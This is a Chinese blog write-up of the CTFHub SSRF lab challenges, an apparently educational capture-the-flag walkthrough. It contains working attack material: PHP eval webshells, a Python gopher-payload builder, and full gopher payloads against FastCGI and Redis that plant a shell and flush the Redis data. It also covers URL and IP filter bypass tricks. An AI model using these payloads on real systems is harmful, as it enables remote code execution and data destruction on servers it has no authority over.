CTFHub-Web-SSRF

最新推荐文章于 2024-05-14 16:27:26 发布
最新推荐文章于 2024-05-14 16:27:26 发布
阅读量1.7k 收藏 24
点赞数 38
分类专栏: CTFHub 文章标签: 前端 android web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48613011/article/details/138328766
版权

CTFHub-Web-SSRF-WP

一、内网访问

1.题目提示说访问127.0.0.1的flag.php,在URL后面添加路径没想到直接访问成功

image-20240417105839461

二、伪协议读取文件

1.题目提示说访问Web目录下的flag.php,联想到Web目录一般存放于/var/www/html/里,去修改URL尝试进行访问。页面显示???,那就尝试查看源代码得到flag

image-20240417110507525

三、端口扫描

1.题目提示说是在8000-9000端口之间,先尝试访问一下8000端口,发现可以访问成功但是没有flag

image-20240417111425619

2.开启Burp抓取刷新数据包发送到intruder

image-20240417111536369

3.选择攻击模式,选择攻击位置,添加攻击

image-20240417111701515

4.设置攻击类型为数值型,设置攻击范围为8001-9000

image-20240417111905823

5.攻击结束后查看长度最长的那个端口号

image-20240417112043686

6.重新进入网站访问该端口发现flag

image-20240417112210308

四、POST请求

1.访问127.0.0.1/flag.php发现了源码中有个key

image-20240417113327043

2.根据Gopher数据包格式构造数据包,尝试进行发送后没有得到Flag

image-20240424224340837

3.根据Gopher数据包特性将URL进行三次编码后重新发送

?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250AContent-Length:%252036%250D%250A%250D%250Akey=85dd6ab1a18c2fabacb046757c84de0b

4.最后得到Flag

image-20240424225954544

五、上传文件

1.打开题目使用file方法打开页面发现有文件上传的入口但是没有提交的选项

http://challenge-f3dab308714b77d2.sandbox.ctfhub.com:10800/?url=file:///var/www/html/flag.php

image-202404242320033572.查看源代码

image-20240424232129319

3.修改HTML源码添加上传按钮

<input type="submit" value="提交">

image-20240424233611574

4.上传一句话木马并抓包

image-20240425001908720

5.将抓到的数据包使用Python程序进行URL编码

import urllib.parse
payload =\
"""POST /flag.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------188096258926377729394142365703
Content-Length: 264
Origin: http://challenge-44de14acddfd51b9.sandbox.ctfhub.com:10800
Connection: close
Referer: http://challenge-44de14acddfd51b9.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php
Upgrade-Insecure-Requests: 1

-----------------------------188096258926377729394142365703
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream

<?php @eval($_POST["shell"]);?>

-----------------------------188096258926377729394142365703--
"""
#注意后面一定要有回车,回车结尾表示http请求结束
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)       # 这里因为是GET请求所以要进行两次url编码

image-20240425003902356

6.将输出的结果粘贴到URL中获取Flag

image-20240425003942647

六、FastCGl协议

1.打开网页后什么都没有,根据提示攻击FastCGl,首先下载Gopherus

image-20240425172905873

2.下载完成后打开gopherus,输入目标文件路径和对一句话木马所进行的base64位编码程序,存储在shell.php文件中

一句话木马

<?php @eval($_POST['x']);?>

将木马进行base64编码后存储为shell.php文件中

cho “PD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8+Cg==” | base64 -d > shell.php

经过payload编码后得到

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH127%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%7F%04%00%3C%3Fphp%20system%28%27echo%20%E2%80%9CPD9waHAgQGV2YWwoJF9QT1NUWyd4J10pOz8%2BCg%3D%3D%E2%80%9D%20%7C%20base64%20-d%20%3E%20shell.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

image-20240425173012910

3.将生成的编码数据复制到靶场的url后面将木马进行上传

image-20240425173413283

4.上传完成后使用蚁剑进行连接

image-20240425173517807

5.进入文件管理即可找到flag文件

在这里插入图片描述

七、Redis协议

1.启动gopherus,选择PHPShell,输入一句话木马生成URL编码

image-20240425175740272

生成的URL编码

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2431%0D%0A%0A%0A%3C%3Fphp%20%40eval%28%24_POST%5B%27x%27%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

2.将生成后的编码再进行一次编码

image-20240425175848799

Python脚本

import urllib.parse
 
payload = ""

tmp = urllib.parse.quote(payload)
print(tmp)

3.将Python程序编码后的结果,输入到URL中进行上传

image-20240425175954763

4.使用蚁剑进行连接

image-20240425175544157

5.打开根目录发现flag文件所在位置

image-20240425175605575

八、URL Bypass

1.http://www.baidu.com@192.168.0.1/与http://192.168.0.1请求的都是192.168.0.1的内容。
因此这个题目要求url must startwith “http://notfound.ctfhub.com

image-20240425180328293

2.直接构造?url=http://notfound.ctfhub.com@127.0.0.1/flag.php得到flag

image-20240425180317033

九、数字IP Byepass

1.老样子先访问flag.php查看内容

image-20240425180928561

2.根据题目提示说,不能使用数字了,那就把数字转换为其他进制进行访问即可得到flag

127.0.0.1–>2130706433     十进制

image-20240425181039604

十、302跳转Bypass

1.访问flag.php发现提示不能访问IP

image-20240425181437746

2.那就改成localhost尝试进行访问,flag直接出来了

image-20240425181606800

十一、DNS重绑定Bypass

1.出题人好像忘记改了,直接输入localhost就能访问flag

image-20240425181758538

CS0_IceCream
关注
  • 38
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTFHUB-web-SSRF
ookami6497的博客
03-25 801
CTFHUB-web-ssrf
CTFHUB--SSRF详解
qq_49422880的博客
05-23 6094
SSRF详解SSRF漏洞介绍一、(内网访问、伪协议利用)1.1内网访问1.2伪协议读取文件1.3端口扫描二、(POST 上传文件 FastCGI协议 Redis协议)2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议三、(Bypass系列)3.1 URL Bypass3.2 数字IP Bypass3.3 302跳转 Bypass3.4 DNS重绑定 Bypass SSRF漏洞介绍    SSRT(Server-Side Request Forgery,服务器端请求伪造),就
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 937
CTFHub技能树-web-ssrf
CTFHUB-SSRF-Redis协议
qq_62078839的博客
04-23 1858
利用工具gopherus来生成payload 这里我们进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换了 gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250...
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
ssrf-king:用于burp的SSRF插件可在所有请求中自动进行SSRF检测
03-07
:check_mark: 它将很快有一个用户界面来指定您自己的回叫有效负载它将很快能够测试Json和XML 测试SMTP SSRF如何安装/建造git clone https://github.com/ethicalhackingplayground/ssrf-king gradle build 现在可以在...
104-web漏洞挖掘之SSRF漏洞1
08-03
1.禁用不需要的协议 2.统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态 3.禁止302跳转,或者每跳转一次,就检查一次新的Host是否是内网
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
picoCTF-Web Exploitation-Web Gauntlet
huckers的博客
05-12 463
按照提示,需要用admin登录,查看filter.php,这应该是一个SQL注入题,提示我们可以使用无痕浏览器来以便cookie可以不用每次清除。中展示了sql过滤逻辑,可以回味一下,尝试用不同的关键字来注入。提示sql过滤or,我们使用。
前端Vue架构
weixin_45678402的博客
05-12 294
defineProperty:监听范围比较窄,只能通过属性描述符去监听已有属性的读取和赋值;兼容性较差,只能兼容支持ES6 的浏览器(要求监听数据是对象)这样写的话,依赖收集只能收集到属性c;如果访问的属性值还是一个对象,对属性值再次进行代理;创建视图的函数(render)和数据之间的关联;当数据发生变化的时候,希望render重新执行;下面的用法,只能收集到c,收集不到c1。依赖收集:a color: #f00。依赖收集:a color: #f00。如何知晓数据对应的函数;监听数据的读取和修改;
前端面试题日常练-day05 【面试题】
qq_44640575的博客
05-11 386
解释:在CSS中,使用`.`作为类选择器,可以选择所有具有指定class名称的元素。例如,如果想选择所有class为"my-class"的元素,可以使用`.my-class`选择器来实现。这样的选择器可以为元素添加特定的样式或者在JavaScript中进行处理。
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
s_sos0的博客
05-14 364
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
根据地址栏url上key获取值
wwf1225的博客
05-10 264
/ 根据url上key获取值,key为参数名字,例如token。
前端页面 贴边拖拽 盒子
m0_46512929的博客
05-13 218
vue 悬浮球(带自动吸附功能)_vue悬浮球-CSDN博客
Java Web开篇
2403_82385265的博客
05-13 168
这是前端和后端组成的系统的框架结构。
JavaScript基础(六)
2401_82863547的博客
05-11 508
console.log('对折了'+i+'次,高度达到了'+paper+'超过了珠峰');当你不知道循环执行多少次,可以写个死循环,然后在循环体内判断,满足条件后break终止即可。依次输入三个弹窗,第一个输入数字,第二个输入运算符,第三个输入数字,然后给出结果。score = prompt('请输入第'+i+'局的成绩')var num2 = prompt('请输入运算符+-*/');但是,这种写法不好,用变量接收输出的写法是最好的,更好维护。或满足一边就行,用ΙΙ对不对,那同时满足用&&,复习一下。
vue3 el-date-picker设置禁用日期,只能选今天或者今天之后的日期
最新发布
Dnn01的博客
05-14 262
vue3 el-date-picker设置禁用日期,只能选今天或者今天之后的日期
CTFHub ssrf
07-29
CTFHub是一个CTF(Capture The Flag)比赛平台,提供了各种安全挑战和漏洞利用的题目。在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转Bypass和DNS重绑定 Bypass。引用\[2\]中提到了CGI和FastCGI协议的运行原理,并介绍了使用Gopherus工具生成攻击FastCGI的payload。引用\[3\]中提到了一个使用Python脚本进行端口扫描的例子。 所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值